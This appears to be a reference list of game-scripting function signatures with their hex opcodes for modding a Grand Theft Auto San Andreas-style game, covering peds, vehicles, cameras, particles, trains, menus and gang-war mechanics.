incrementIntStat(int stat, int add) 0623
incrementFloatStat(int stat, float add) 0624
decrementIntStat(int stat, int int) 0625
decrementFloatStat(int stat, float float) 0626
registerIntStat(int stat, int int) 0627
registerFloatStat(int stat, float value) 0628
setIntStat(int stat, int int) 0629
setFloatStat(int stat, float float) 062A
int status = getScriptTaskStatus(Ped ped, int task) 062E
int group = createGroup(int type) 062F
setGroupLeader(int group, Ped ped) 0630
setGroupMember(int group, Ped ped) 0631
removeGroup(int group) 0632
taskLeaveAnyCar(Ped ped) 0633
taskKillCharOnFootWhileDucking(Ped ped, int weapon, int flags, int time, int chance) 0634
taskAimGunAtChar(Ped ped, int aimAt, int timeMS) 0635
taskGoToCoordWhileShooting(Ped ped, float toX, float toY, float toZ, int mode, float turnRadius, float stopRadius, int lookAtActor) 0637
taskStayInSamePlace(Ped ped, bool stay) 0638
taskTurnCharToFaceChar(Ped ped, int rotateTo) 0639
bool result = isCharAtScriptedAttractor(Ped ped, int origin) 0642
setSequenceToRepeat(int pack, bool loop) 0643
int progess = getSequenceProgress(Ped ped) 0646
clearLookAt(Ped ped) 0647
setFollowNodeThresholdDistance(Ped ped, float dist) 0648
Particle particle = createFxSystem(string particle, float pX, float pY, float pZ, int type) 064B
playFxSystem(Particle particle) 064C
stopFxSystem(Particle particle) 064E
playAndKillFxSystem(Particle particle) 064F
killFxSystem(Particle particle) 0650
int stat = getIntStat(int stat) 0652
float stat = getFloatStat(int stat) 0653
setObjectRenderScorched(Object object, bool fireproof) 0654
taskLookAtObject(Ped ped, int lookAt, int timeMS) 0655
float float = limitAngle(float angle) 0656
openCarDoor(Vehicle car, int door) 0657
float X, float Y, float Z = getPickupCoordinates(Pickup pickup) 065B
removeDecisionMaker(int maker) 065C
Model modelId = getCharModel(Ped ped) 0665
taskAimGunAtCoord(Ped ped, float atX, float atY, float atZ, int timeMS) 0667
taskShootAtCoord(Ped ped, float atX, float atY, float atZ, int timeMS) 0668
Particle particle = createFxSystemOnChar(string particle, Ped ped, float offsetX, float offsetY, float offsetZ, int type) 0669
Particle particle = createFxSystemOnCharWithDirection(string particle, Ped ped, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ, int type) 066A
Particle particle = createFxSystemOnCar(string particle, Vehicle car, float offsetX, float offsetY, float offsetZ, int type) 066B
Particle particle = createFxSystemOnCarWithDirection(string particle, Vehicle car, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ, int type) 066C
Particle particle = createFxSystemOnObject(string particle, Object object, float offsetX, float offsetY, float offsetZ, int type) 066D
Particle particle = createFxSystemOnObjectWithDirection(string particle, Object object, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ, int flag) 066E
taskDestroyCar(Ped ped, Vehicle car) 0672
taskDiveAndGetUp(Ped ped, float toOffsetX, float toOffsetY, int time) 0673
customPlateForNextCar(Model modelId, string numberplate) 0674
taskShuffleToNextCarSeat(Ped ped, Vehicle car) 0676
taskChatWithChar(Ped ped, int withActor, bool flag, int unknownFlag) 0677
attachCameraToVehicle(Vehicle car, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ, float tilt, int switchstyle) 0679
attachCameraToVehicleLookAtVehicle(Vehicle car, float offsetX, float offsetY, float offsetZ, int toCar, float tilt, int switchstyle) 067A
attachCameraToVehicleLookAtChar(Vehicle car, float offsetX, float offsetY, float offsetZ, Ped ped, float tilt, int switchstyle) 067B
attachCameraToChar(Ped ped, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ, float tilt, int switchstyle) 067C
attachCameraToCharLookAtChar(Ped ped, float offsetX, float offsetY, float offsetZ, int targetActor, float tilt, int switchstyle) 067E
forceCarLights(Vehicle car, int lights) 067F
addPedtypeAsAttractorUser(int ASOrigin, int pedtype) 0680
attachObjectToCar(Object object, Vehicle car, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ) 0681
detachObject(Object object, float X, float Y, float Z, bool collisionDetection) 0682
attachCarToCar(Vehicle car, int toCar, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ) 0683
detachCar(Vehicle car, float X, float Y, float Z, bool collisionDetection) 0684
bool result = isObjectAttached(Object object) 0685
bool result = isVehicleAttached(Vehicle car) 0686
clearCharTasks(Ped ped) 0687
taskTogglePedThreatScanner(Ped ped, bool unknownFlag1, bool unknownFlag2, bool unknownFlag3) 0688
popCarDoor(Vehicle car, int door, bool visible) 0689
fixCarDoor(Vehicle car, int door) 068A
taskEveryoneLeaveCar(Vehicle car) 068B
bool result = isPlayerTargettingAnything(Player player) 068C
float X, float Y, float Z = getActiveCameraCoordinates() 068D
float X, float Y, float Z = getActiveCameraPointAt() 068E
popCarPanel(Vehicle car, int component, bool effectFlag) 0697
fixCarPanel(Vehicle car, int componentB) 0698
fixCarTire(Vehicle car, int tire) 0699
attachObjectToObject(Object object, int toObject, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ) 069A
attachObjectToChar(Object object, Ped ped, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ) 069B
float vecX, float vecY, float vecZ = getCarSpeedVector(Vehicle car) 06A2
float mass = getCarMass(Vehicle car) 06A3
taskDiveFromAttachmentAndGetUp(Ped ped, int timeMS) 06A5
attachCharToBike(Ped ped, Vehicle car, float offsetX, float offsetY, float offsetZ, int position, float shootingAngle1, float shootingAngle2, int weapon) 06A7
taskGotoCharOffset(Ped ped, int toActor, int timelimit, float approachDistance, float approachAngle) 06A8
taskLookAtCoord(Ped ped, float toX, float toY, float toZ, int timeMS) 06A9
hideCharWeaponForScriptedCutscene(Ped ped, bool hide) 06AB
float speed = getCharSpeed(Ped ped) 06AC
setGroupDecisionMaker(int group, int maker) 06AD
int maker = loadGroupDecisionMaker(int type) 06AE
disablePlayerSprint(Player player, bool mode) 06AF
taskSitDown(Ped ped, int timeMS) 06B0
Searchlight searchlight = createSearchlight(float atX, float atY, float atZ, float targetX, float targetY, float targetZ, float radius1, float radius2) 06B1
deleteSearchlight(Searchlight searchlight) 06B2
bool result = doesSearchlightExist(Searchlight searchlight) 06B3
moveSearchlightBetweenCoords(Searchlight searchlight, float fromX, float fromY, float fromZ, float toX, float toY, float toZ, float speed) 06B4
pointSearchlightAtCoord(Searchlight searchlight, float toX, float toY, float toZ, float speed) 06B5
pointSearchlightAtChar(Searchlight searchlight, Ped ped, float speed) 06B6
bool result = isCharInSearchlight(Searchlight searchlight, Ped ped) 06B7
bool result = hasCutsceneLoaded() 06B9
taskTurnCharToFaceCoord(Ped ped, float atX, float atY, float atZ) 06BA
taskDrivePointRoute(Ped ped, Vehicle car, float speed) 06BB
fireSingleBullet(float fromX, float fromY, float fromZ, float targetX, float targetY, float targetZ, int energy) 06BC
bool result = isLineOfSightClear(float fromX, float fromY, float fromZ, float toX, float toY, float toZ, bool checkBuildings, bool checkVehicles, bool checkActors, bool checkObjects, bool checkParticles) 06BD
float roll = getCarRoll(Vehicle car) 06BE
pointSearchlightAtVehicle(Searchlight searchlight, Vehicle car, float speed) 06BF
bool result = isVehicleInSearchlight(int int, Vehicle car) 06C0
Searchlight searchlight = createSearchlightOnVehicle(Vehicle car, float offsetX, float offsetY, float offsetZ, float targetX, float targetY, float targetZ, float radius, float radius) 06C1
taskGoToCoordWhileAiming(Ped ped, float toX, float toY, float toZ, int mode, float turnRadius, float stopRadius, Ped ped, float offsetX, float offsetY, float offsetZ) 06C2
int num = getNumberOfFiresInRange(float atX, float atY, float atZ, float radius) 06C3
Marker marker = addBlipForSearchlight(Searchlight searchlight) 06C4
skipToEndAndStopPlaybackRecordedCar(Vehicle car) 06C5
taskCarTempAction(Ped ped, Vehicle car, int performAction, int timelimit) 06C7
setLaRiots(bool enable) 06C8
removeCharFromGroup(Ped ped) 06C9
attachSearchlightToSearchlightObject(Searchlight searchlight, int tower, int housing, int bulb, float offsetX, float offsetY, float offsetZ) 06CA
switchEmergencyServices(bool enable) 06D0
Checkpoint checkpoint = createCheckpoint(int type, float atX, float atY, float atZ, float pointX, float pointY, float pointZ, float radius) 06D5
deleteCheckpoint(Checkpoint checkpoint) 06D6
switchRandomTrains(bool enable) 06D7
Vehicle train = createMissionTrain(int type, float atX, float atY, float atZ, bool direction) 06D8
deleteMissionTrains() 06D9
markMissionTrainsAsNoLongerNeeded() 06DA
deleteAllTrains() 06DB
setTrainSpeed(Vehicle train, float speed) 06DC
setTrainCruiseSpeed(Vehicle train, float speed) 06DD
int caboose = getTrainCaboose(Vehicle train) 06DE
deletePlayer(Player player) 06DF
setTwoPlayerCameraMode(bool mode) 06E0
taskCarMission(Ped ped, Vehicle car, int targetCar, int order, float maxSpeed, int trafficFlag) 06E1
taskGoToObject(Ped ped, int toObject, int timelimit, float stopWithinRadius) 06E2
taskWeaponRoll(Ped ped, bool roll) 06E3
taskCharArrestChar(Ped ped, int bustActor) 06E4
Model itemID = getAvailableVehicleMod(Vehicle car, int poolIndex) 06E5
int type = getVehicleModType(Model component) 06E6
int componentId = addVehicleMod(Vehicle car, Model component) 06E7
removeVehicleMod(Vehicle car, int componentId) 06E8
requestVehicleMod(Model component) 06E9
bool result = hasVehicleModLoaded(Model component) 06EA
markVehicleModAsNoLongerNeeded(Model component) 06EB
int num = getNumAvailablePaintjobs(Vehicle car) 06EC
giveVehiclePaintjob(int set, int paintjob) 06ED
bool result = isGroupMember(Ped ped, int group) 06EE
bool result = isGroupLeader(Ped ped, int group) 06EF
setGroupSeparationRange(int group, float range) 06F0
limitTwoPlayerDistance(float distance) 06F1
releaseTwoPlayerDistance() 06F2
setPlayerPlayerTargetting(bool can) 06F3
float X, float Y, float Z = getScriptFireCoords(int fire) 06F5
float X, float Y, float Z, float ZAngle = getNthClosestCarNodeWithHeading(float forX, float forY, float forZ, int direction) 06F8
setPlayersCanBeInSeparateCars(bool allow) 06FA
bool result = doesCarHaveStuckCarCheck(Vehicle car) 06FC
setPlaybackSpeed(Vehicle car, float speed) 06FD
bool result = areAnyCharsNearChar(Ped ped, float range) 06FF
skipCutsceneEnd() 0701
int percentage = getPercentageTaggedInArea(float x1, float y1, float x2, float y2) 0702
setTagStatusInArea(float x1, float y1, float x2, float y2, bool value) 0703
carGotoCoordinatesRacing(Vehicle car, float toX, float toY, float toZ) 0704
startPlaybackRecordedCarUsingAi(Vehicle car, int path) 0705
skipInPlaybackRecordedCar(Vehicle car, float path) 0706
clearCharDecisionMakerEventResponse(int maker, int event) 0708
addCharDecisionMakerEventResponse(int maker, int event, int taskID, float respect, float hate, float like, float dislike, bool inCar, bool onFoot) 0709
taskPickUpObject(Ped ped, Object object, float offsetX, float offsetY, float offsetZ, int boneId1, int boneId2, string performAnimation, int IFPFile, int time) 070A
dropObject(Ped ped, bool object) 070B
explodeCarInCutscene(Vehicle car) 070C
buildPlayerModel(Player player) 070D
planeAttackPlayer(int hydra, Vehicle car, float radius) 070E
planeFlyInDirection(int plane, float direction, float altitudemin, float altitudemax) 070F
planeFollowEntity(int plane, Ped ped, Vehicle car, float radius) 0710
taskDriveBy(Ped ped, int drivebyActor, Vehicle car, float pX, float pY, float pZ, float radiusX, int radiusY, bool radiusZ, int firingRate) 0713
setCarStayInSlowLane(Vehicle car, bool stay) 0714
takeRemoteControlOfCar(Player player, Vehicle car) 0715
bool result = isClosestObjectOfTypeSmashedOrDamaged(Model object, float atX, float atY, float atZ, float radius, bool smashed, bool damaged) 0716
startSettingUpConversation(Ped ped) 0717
finishSettingUpConversation() 0719
bool result = isConversationAtNode(Ped ped, GxtString gxtString) 071A
int health = getObjectHealth(Object object) 071E
setObjectHealth(Object object, int health) 071F
breakObject(Object object, int intensity) 0723
heliAttackPlayer(Vehicle heli, Player player, float radius) 0724
heliFollowEntity(Vehicle heli, Ped ped, Vehicle car, float radius) 0726
policeHeliChaseEntity(Vehicle heli, Ped ped, Vehicle car, float radius) 0727
taskUseMobilePhone(Ped ped, bool hold) 0729
taskWarpCharIntoCarAsDriver(Ped ped, Vehicle car) 072A
taskWarpCharIntoCarAsPassenger(Ped ped, Vehicle car, int passengerseat) 072B
switchCopsOnBikes(bool generate) 072C
bool result = isFlameInAngledArea2d(float x1, float y1, float x2, float y2, float angle, bool sphere) 072D
bool result = isFlameInAngledArea3d(float x1, float y1, float z1, float x2, float y2, float z2, float angle, bool sphere) 072E
addStuckCarCheckWithWarp(Vehicle car, float checkDistance, int time, bool stuck, bool flipped, bool warp, int path) 072F
damageCarPanel(Vehicle car, int door) 0730
setCarRoll(Vehicle car, float roll) 0731
bool result = suppressCarModel(Model modelId) 0732
dontSuppressCarModel(Model modelId) 0733
dontSuppressAnyCarModels() 0734
bool result = isPs2KeyboardKeyPressed(int key) 0735
bool result = isPs2KeyboardKeyJustPressed(int key) 0736
bool result = isCharHoldingObject(Ped ped, int liftingObject) 0737
setCarCanGoAgainstTraffic(Vehicle car, bool can) 073B
damageCarDoor(Vehicle car, int door) 073C
Vehicle car = getRandomCarInSphereNoSave(float X, float Y, float Z, float radius, int model) 073E
Ped ped = getRandomCharInSphere(float X, float Y, float Z, float radius, bool pedtypeCivilian, bool gang, bool prostitute) 073F
bool result = hasCharBeenArrested(Ped ped) 0741
setPlaneThrottle(int plane, float throttle) 0742
heliLandAtCoords(Vehicle heli, float X, float Y, float Z, float minaltitude, float maxaltitude) 0743
planeStartsInAir(int hydra) 0745
setRelationship(int acquaintance, int pedtype, int toPedtype) 0746
clearRelationship(int acquaintance, int pedtype, int toPedtype) 0747
clearGroupDecisionMakerEventResponse(int maker, int event) 0749
addGroupDecisionMakerEventResponse(int maker, int event, int taskID, float respect, float hate, float like, float dislike, bool inCar, bool onFoot) 074A
drawSpriteWithRotation(int texture, float x, float y, float scaleX, float scaleY, float angle, int r, int g, int b, int a) 074B
taskUseAttractor(Ped ped, int attractor) 074C
taskShootAtChar(Ped ped, int atActor, int timelimit) 074D
setInformRespectedFriends(int flags, float radius, int pedsToScan) 074E
bool result = isCharRespondingToEvent(Ped ped, int event) 074F
setObjectVisible(Object object, bool visibility) 0750
taskFleeCharAnyMeans(Ped ped, int fleeFrom, float runDistance, int time, bool changeCourse, int unkTime1, int unkTime2, float awayRadius) 0751
flushPatrolRoute() 0754
extendPatrolRoute(float X, float Y, float Z, string animation, string IFPFile) 0755
bool result = playObjectAnim(Object object, string animation, string IFPFile, float framedelta, bool lockF, bool loop) 075A
setRadarZoom(int zoom) 075B
bool result = doesBlipExist(Marker marker) 075C
loadPrices(GxtString shopping) 075D
loadShop(GxtString shopping) 075E
int num = getNumberOfItemsInShop() 075F
int item = getItemInShop(int index) 0760
int price = getPriceOfItem(int item) 0761
taskDead(Ped ped) 0762
setCarAsMissionCar(Vehicle car) 0763
setZonePopulationType(GxtString zone, int popcycle) 0767
setZoneDealerStrength(GxtString zone, int density) 076A
int strength = getZoneDealerStrength(GxtString zone) 076B
setZoneGangStrength(GxtString zone, int gang, int density) 076C
int density = getZoneGangStrength(GxtString zone, int gang) 076D
bool result = isMessageBeingDisplayed() 076F
setCharIsTargetPriority(Ped ped, bool targetPriority) 0770
customPlateDesignForNextCar(Model modelNumplate, int townTexture) 0771
taskGotoCar(Ped ped, Vehicle car, int timeMS, float stopAtDistance) 0772
requestIpl(string group) 0776
removeIpl(string group) 0777
removeIplDiscreetly(string group) 0778
setCharRelationship(Ped ped, int acquaintance, int pedtype) 077A
clearCharRelationship(Ped ped, int acquaintance, int pedtype) 077B
clearAllCharRelationships(Ped ped, int acquaintance) 077C
float pitch = getCarPitch(Vehicle car) 077D
int interior = getActiveInterior() 077E
heliKeepEntityInView(Vehicle heli, Ped ped, Vehicle car, float minaltitude, float maxaltitude) 0780
int model = getWeapontypeModel(int id) 0781
int slot = getWeapontypeSlot(int id) 0782
int info = getShoppingExtraInfo(int item, int flag) 0783
givePlayerClothes(Player player, int texture, int model, int bodypart) 0784
int num = getNumberOfFiresInArea(float x1, float y1, float z1, float x2, float y2, float z2) 0786
attachWinchToHeli(Vehicle heli, bool magnet) 0788
releaseEntityFromWinch(Vehicle heli) 0789
int carriage = getTrainCarriage(Vehicle train, int handle) 078A
Vehicle carHandle, Ped pedHandle, Object objectHandle = grabEntityOnWinch(Vehicle heli) 078B
GxtString name = getNameOfItem(int item) 078C
taskClimb(Ped ped, bool climb) 078F
buyItem(int item) 0790
clearCharTasksImmediately(Ped ped) 0792
storeClothesState() 0793
restoreClothesState() 0794
float length = getRopeHeightForObject(int magnet) 0796
setRopeHeightForObject(int magnet, float length) 0797
Vehicle carHandle, Ped pedHandle, Object objectHandle = grabEntityOnRopeForObject(int magnet) 0798
releaseEntityFromRopeForObject(int magnet) 0799
playerEnteredDockCrane() 079D
playerEnteredBuildingsiteCrane() 079E
playerLeftCrane() 079F
performSequenceTaskFromProgress(Ped ped, int sequence, int unkProgress1, int unkProgress2) 07A0
setNextDesiredMoveState(int speed) 07A1
taskGotoCharAiming(Ped ped, int followActor, float minradius, float maxradius) 07A3
int unkProgress1, int unkProgress2 = getSequenceProgressRecursive(Ped ped) 07A4
taskKillCharOnFootTimed(Ped ped, int attackActor, int time) 07A5
float X, float Y, float Z = getNearestTagPosition(float X, float Y, float Z) 07A6
taskJetpack(Ped ped) 07A7
setArea51SamSite(bool enable) 07A8
bool result, Searchlight searchlight = isCharInAnySearchlight(Ped ped) 07A9
bool result = isTrailerAttachedToCab(Vehicle trailer, Vehicle car) 07AB
detachTrailerFromCab(Vehicle trailer, Vehicle cab) 07AC
int group = getPlayerGroup(Player player) 07AF
GxtString shop = getLoadedShop() 07B0
int int2, int int3, int int4 = getBeatProximity(int track) 07B1
setGroupDefaultTaskAllocator(int group, int command) 07B3
setPlayerGroupRecruitment(Player player, bool enabled) 07B4
activateHeliSpeedCheat(Vehicle heli, int power) 07BB
taskSetCharDecisionMaker(Ped ped, int maker) 07BC
deleteMissionTrain(Vehicle train) 07BD
markMissionTrainAsNoLongerNeeded(Vehicle train) 07BE
setBlipAlwaysDisplayOnZoomedRadar(Marker marker, bool displayAlways) 07BF
requestCarRecording(int path) 07C0
bool result = hasCarRecordingBeenLoaded(int path) 07C1
setMissionTrainCoordinates(Vehicle train, float X, float Y, float Z) 07C7
taskComplexPickupObject(Ped ped, Object object) 07C9
listenToPlayerGroupCommands(Ped ped, bool listen) 07CB
setPlayerEnterCarButton(Player player, bool can) 07CC
taskCharSlideToCoord(Ped ped, float toX, float toY, float toZ, float angle, float withinRadius) 07CD
int weekday = getCurrentDayOfWeek() 07D0
registerScriptBrainForCodeUse(int id, GxtString gxtString) 07D3
applyForceToCar(Vehicle car, float vecX, float vecY, float vecZ, float rotationX, float rotationY, float rotationZ) 07D5
addToCarRotationVelocity(Vehicle car, float vecX, float vecY, float vecZ) 07DA
setCarRotationVelocity(Vehicle car, float vecX, float vecY, float vecZ) 07DB
setCharShootRate(Ped ped, int rate) 07DD
bool result = isModelInCdimage(Model modelId) 07DE
removeOilPuddlesInArea(float x1, float y1, float x2, float y2) 07DF
setBlipAsFriendly(Marker marker, bool type) 07E0
taskSwimToCoord(Ped ped, float toX, float toY, float toZ) 07E1
float x1, float y1, float z1, float x2, float y2, float z2 = getModelDimensions(Model modelId) 07E4
int maker = copyCharDecisionMaker(Ped ped) 07E5
int maker = copyGroupDecisionMaker(int group) 07E6
taskDrivePointRouteAdvanced(Ped ped, Vehicle car, float speed, int flag1, int flag2, int flag3) 07E7
bool result = isRelationshipSet(int acquaintance, int ofActors, int toActors) 07E8
setCarAlwaysCreateSkids(Vehicle car, bool enable) 07EE
int city = getCityFromCoords(float X, float Y, float Z) 07EF
bool result = hasObjectOfTypeBeenSmashed(float X, float Y, float Z, float radius, Model modelId) 07F0
bool result = isPlayerPerformingWheelie(Player player) 07F1
bool result = isPlayerPerformingStoppie(Player player) 07F2
setCheckpointCoords(Checkpoint checkpoint, float X, float Y, float Z) 07F3
controlCarHydraulics(Vehicle car, float f1, float f2, float f3, float f4) 07F5
int numberOfLeaders, int numberOfMembers = getGroupSize(int group) 07F6
setObjectCollisionDamageEffect(Object object, bool destructible) 07F7
setCarFollowCar(Vehicle car, int followCar, float radius) 07F8
playerEnteredQuarryCrane() 07F9
playerEnteredLasVegasCrane() 07FA
switchEntryExit(GxtString interior, bool access) 07FB
displayTextWithFloat(float X, float Y, GxtString GXT, float value, int flag) 07FC
bool result = doesGroupExist(int group) 07FD
giveMeleeAttackToChar(Ped ped, int fightingStyle, int moves) 07FE
setCarHydraulics(Vehicle car, bool hydraulics) 07FF
bool result = is2playerGameGoingOn() 0800
float fov = getCameraFov() 0801
bool result = doesCarHaveHydraulics(Vehicle car) 0803
taskCharSlideToCoordAndPlayAnim(Ped ped, float toX, float toY, float toZ, float angle, float radius, string animation, int ifp1, float ifp2, bool LA, bool LX, bool LY, bool LF, int LT) 0804
int number = getTotalNumberOfPedsKilledByPlayer(Player player) 0806
float X, float Y, float Z = getLevelDesignCoordsForObject(Object object, int spoot) 080A
int event = getCharHighestPriorityEvent(Ped ped) 080E
float X, float Y, float Z = getParkingNodeInArea(float x1, float y1, float z1, float x2, float y2, float z2) 0810
Vehicle car = getCarCharIsUsing(Ped ped) 0811
taskPlayAnimNonInterruptable(Ped ped, string animation, string IFP, float framedelta, bool loopA, bool lockX, bool lockY, bool lockF, int time) 0812
addStuntJump(float startX, float startY, float startZ, float radiusX, float radiusY, float radiusZ, float goalX, float goalY, float goalZ, float radius2X, float radius2Y, float radius2Z, float cameraX, float cameraY, float cameraZ, int reward) 0814
setObjectCoordinatesAndVelocity(Object object, float X, float Y, float Z) 0815
setCharKindaStayInSamePlace(Ped ped, bool stay) 0816
taskFollowPatrolRoute(Ped ped, int walkMode, int routeMode) 0817
bool result = isCharInAir(Ped ped) 0818
float height = getCharHeightAboveGround(Ped ped) 0819
setCharWeaponSkill(Ped ped, int skill) 081A
setTextEdge(int size, int r, int g, int b, int a) 081C
setCarEngineBroken(Vehicle car, bool broken) 081D
bool result = isThisModelABoat(Model modelId) 081E
bool result = isThisModelAPlane(Model modelId) 081F
bool result = isThisModelAHeli(Model modelId) 0820
setFirstPersonInCarCameraMode(bool enable) 0822
taskGreetPartner(Ped ped, Ped ped2, float unk1, int unk2) 0823
setHeliBladesFullSpeed(Vehicle heli) 0825
displayHud(bool enable) 0826
connectLods(Object object, int lod) 0827
setMaxFireGenerations(int max) 0828
taskDieNamedAnim(Ped ped, string animation, string ifp1, float ifp2, int time) 0829
setPlayerDuckButton(Player player, bool able) 082A
setPoolTableCoords(float x1, float y1, float z1, float x2, float y2, float z2) 0830
bool result = hasObjectBeenPhotographed(Object object) 0833
doCameraBump(float rotationZ, float rotationY) 0834
int day, int month = getCurrentDate() 0835
setObjectAnimSpeed(Object object, string animation, float speed) 0836
bool result = isObjectPlayingAnim(Object object, string anim) 0837
float progress = getObjectAnimCurrentTime(Object object, string animation) 0839
setObjectAnimCurrentTime(Object object, string animation, float progress) 083A
setCharVelocity(Ped ped, float vecX, float vecY, float vecZ) 083C
float vecX, float vecY, float vecZ = getCharVelocity(Ped ped) 083D
setCharRotation(Ped ped, float vecX, float vecY, float vecZ) 083E
float value = getCarUprightValue(Vehicle car) 083F
setVehicleInterior(Vehicle car, int interior) 0840
selectWeaponsForVehicle(Vehicle car, bool gun) 0841
int city = getCityPlayerIsIn(Player player) 0842
GxtString name = getNameOfZone(float X, float Y, float Z) 0843
activateInteriorPeds(bool activate) 084D
setVehicleCanBeTargetted(Vehicle car, bool unk) 084E
taskFollowFootsteps(Ped ped, int followActor) 0850
damageChar(Ped ped, int health, bool affectArmour) 0851
setCarCanBeVisiblyDamaged(Vehicle car, bool can) 0852
setHeliReachedTargetDistance(Vehicle heli, int dist) 0853
float level = getSoundLevelAtCoords(Ped ped, float X, float Y, float Z) 0855
setCharAllowedToDuck(Ped ped, bool enable) 0856
setHeadingForAttachedPlayer(Player player, float toAngle, float rotationSpeed) 0858
taskWalkAlongsideChar(Ped ped, int alongisdeActor) 0859
createEmergencyServicesCar(Model car, float X, float Y, float Z) 085A
taskKindaStayInSamePlace(Ped ped, bool stay) 085B
startPlaybackRecordedCarLooped(Vehicle car, int path) 085E
setCharInterior(Ped ped, int interior) 0860
bool result = isAttachedPlayerHeadingAchieved(Player player) 0861
enableEntryExitPlayerGroupWarping(float X, float Y, float radius, bool access) 0864
Object object = getClosestStealableObject(float X, float Y, float Z, float radius) 0866
bool result = isProceduralInteriorActive(int interior) 0867
removeCarRecording(int path) 0873
setZonePopulationRace(GxtString zone, int popcycle) 0874
setObjectOnlyDamagedByPlayer(Object object, bool player) 0875
createBirds(float x1, float y1, float z1, float x2, float y2, float z2, int flag1, int flag2) 0876
setVehicleDirtLevel(Vehicle car, float level) 0878
setGangWarsActive(bool enable) 0879
bool result = isGangWarGoingOn() 087A
givePlayerClothesOutsideShop(Player player, string clothes, string model, int bodyPart) 087B
clearLoadedShop() 087C
setGroupSequence(int group, int Aspack) 087D
setCharDropsWeaponsWhenDead(Ped ped, bool droppable) 087E
setCharNeverLeavesGroup(Ped ped, bool set) 087F
setPlayerFireButton(Player player, bool able) 0881
attachFxSystemToCharBone(Particle particle, Ped ped, int mode) 0883
registerAttractorScriptBrainForCodeUse(int handle, GxtString script) 0884
setHeadingLimitForAttachedChar(Ped ped, int orientation, float limit) 0887
Marker blip = addBlipForDeadChar(Ped ped) 0888
float X, float Y, float Z = getDeadCharCoordinates(Ped ped) 0889
taskPlayAnimWithFlags(Ped ped, string animation, string ifp, float framedelta, bool loopA, bool lockX, bool lockY, bool lockF, int time, bool force, bool lockZ) 088A
setVehicleAirResistanceMultiplier(Vehicle car, float multiplier) 088B
setCarCoordinatesNoOffset(Vehicle car, float X, float Y, float Z) 088C
setUsesCollisionOfClosestObjectOfType(float X, float Y, float Z, float radius, Model modelId, bool collisionDetection) 088D
setTimeOneDayForward() 088E
setTimerBeepCountdownTime(VarId timer, int reach) 0890
attachTrailerToCab(int trailer, int cab) 0893
bool result = isVehicleTouchingObject(Vehicle car, Object object) 0897
enableCraneControls(bool UP, bool DOWN, bool RELEASE) 0898
bool result = isPlayerInPositionForConversation(Ped ped) 089B
enableConversation(Ped ped, bool enable) 089C
Ped ped = getRandomCharInSphereOnlyDrugsBuyers(float X, float Y, float Z, float radius) 089E
int pedtype = getPedType(Ped ped) 089F
bool result = taskUseClosestMapAttractor(Ped ped, float radius, Model nearModel, float offsetX, float offsetY, float offsetZ, string scriptNamed) 08A0
planeAttackPlayerUsingDogFight(int hydra, Player player, float radius) 08A2
canTriggerGangWarWhenOnAMission(bool can) 08A3
controlMovableVehiclePart(Vehicle car, float angle) 08A4
winchCanPickVehicleUp(Vehicle car, bool attractive) 08A5
openCarDoorABit(Vehicle car, int door, float rotation) 08A6
bool result = isCarDoorFullyOpen(Vehicle car, int door) 08A7
setAlwaysDraw3dMarkers(bool set) 08A8
streamScript(int script) 08A9
bool result = hasStreamedScriptLoaded(int script) 08AB
setGangWarsTrainingMission(bool set) 08AC
setCharHasUsedEntryExit(Ped ped, float X, float Y, float radius) 08AD
setCharMaxHealth(Ped ped, int health) 08AF
setNightVision(bool enable) 08B1
setInfraredVision(bool enable) 08B2
setZoneForGangWarsTraining(GxtString zone) 08B3
setCharCanBeKnockedOffBike(Ped ped, bool can) 08C6
setCharCoordinatesDontWarpGang(Ped ped, float X, float Y, float Z) 08C7
addPriceModifier(int item, int price) 08C8
removePriceModifier(int item) 08C9
initZonePopulationSettings() 08CA
explodeCarInCutsceneShakeAndBits(Vehicle car, bool shake, bool effect, bool sound) 08CB
bool result = isSkipCutsceneButtonPressed() 08D0
bool result, float X, float Y, float Z = getCutsceneOffset() 08D1
setObjectScale(Object object, float scale) 08D2
int popcycle = getCurrentPopulationZoneType() 08D3
int menu = createMenu(GxtString title, float posX, float posY, float width, int columns, bool interactive, bool background, int alignment) 08D4
setMenuColumnOrientation(int menu, int column, int alignment) 08D6
int item = getMenuItemSelected(int menu) 08D7
int item = getMenuItemAccepted(int menu) 08D8
activateMenuItem(int menu, int row, bool enable) 08D9
deleteMenu(int menu) 08DA
setMenuColumn(int menu, int column, GxtString header, GxtString data1, GxtString data2, GxtString data3, GxtString data4, GxtString data5, GxtString data6, GxtString data7, GxtString data8, GxtString data9, GxtString data10, GxtString data11, GxtString data12) 08DB
setBlipEntryExit(Marker marker, float X, float Y, float radius) 08DC
switchDeathPenalties(bool lose) 08DD
switchArrestPenalties(bool lose) 08DE
setExtraHospitalRestartPoint(float X, float Y, float Z, float radius, float angle) 08DF
setExtraPoliceStationRestartPoint(float X, float Y, float Z, float radius, float angle) 08E0
int num = findNumberTagsTagged() 08E1
int percentage = getTerritoryUnderControlPercentage() 08E2
bool result = isObjectInAngledArea2d(Object object, float x1, float y1, float x2, float y2, float radius, bool sphere) 08E3
bool result = isObjectInAngledArea3d(Object object, float x1, float y1, float z1, float x2, float y2, float z2, float depth, bool flag) 08E4
Ped ped = getRandomCharInSphereNoBrain(float X, float Y, float Z, float radius) 08E5
setPlaneUndercarriageUp(int plane, bool set) 08E6
disableAllEntryExits(bool disable) 08E7
attachAnimsToModel(Model modelId, GxtString externalScript) 08E8
setObjectAsStealable(Object object, bool liftable) 08E9
setCreateRandomGangMembers(bool enable) 08EA
addSparks(float posX, float posY, float posZ, float vecX, float vecY, float vecZ, int density) 08EB
int class = getVehicleClass(Vehicle car) 08EC
clearConversationForChar(Ped ped) 08ED
setMenuItemWithNumber(int panel, int column, int row, GxtString gxtString, int number) 08EE
setMenuItemWith2Numbers(int panel, int column, int row, GxtString gxtString, int numbers1, int numbers2) 08EF
setCutsceneModelTexture(GxtString cutsceneModel, GxtString textureName) 08F0
GxtString nameB = getNameOfInfoZone(float atX, float atY, float atZ) 08F1
